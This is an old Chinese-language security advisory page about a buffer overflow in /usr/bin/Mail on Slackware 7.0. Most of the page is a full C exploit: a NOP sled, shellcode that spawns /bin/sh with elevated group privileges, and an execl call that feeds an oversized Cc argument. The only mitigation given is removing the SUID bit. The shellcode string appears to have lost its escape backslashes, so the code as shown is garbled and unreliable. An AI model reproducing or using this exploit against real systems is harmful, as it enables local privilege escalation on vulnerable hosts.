usr/bin/Mail exploit for Slackware 7.0发布时间:2000-05-14 更新时间:2000-05-14 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Slackware 7.0详细描述 一个关于Slackware的mail缓冲溢出漏洞利用程序。 测试代码 /* * mail-slak.c (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br> * * Exploit for /usr/bin/Mail. * Made specially for Slackware Linux 7.0. * Based on mailx.c by funkySh. * * OBS.: Without fprintf(stderr) is not possible to print the message. * * USAGE: * slack$ ./mail-slak * type `.` and enter: . * Cc: too long to edit * sh-2.03$ id * uid=1000(user) gid=12(mail) groups=100(users) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> char buffer[10000]; char shellcode[] = "x31xdbx31xc9xbbxffxffxffxffxb1x0cx31" "xc0xb0x47xcdx80x31xdbx31xc9xb3x0cxb1" "x0cx31xc0xb0x47xcdx80xebx1fx5ex89x76" "x08x31xc0x88x46x07x89x46x0cxb0x0bx89" "xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89" "xd8x40xcdx80xe8xdcxffxffxff/bin/sh"; unsigned long getesp(void) { __asm__("movl %esp,%eax"); } int main(int argc, char **argv) { int x; long addr = getesp() - 18000; memset(buffer, 0x90, 10000); memcpy(buffer + 800, shellcode, strlen(shellcode)); for(x = 876; x < 9998; x += 4) *(int *)&buffer[x] = addr; fprintf(stderr, "type `.` and enter: "); execl("/usr/bin/Mail", "/usr/bin/Mail", "nobody", "-s", "blah", "-c", buffer, 0); } /* mail-slack.c: EOF */ 解决方案 尚无,可以取消SUID位 相关信息 |
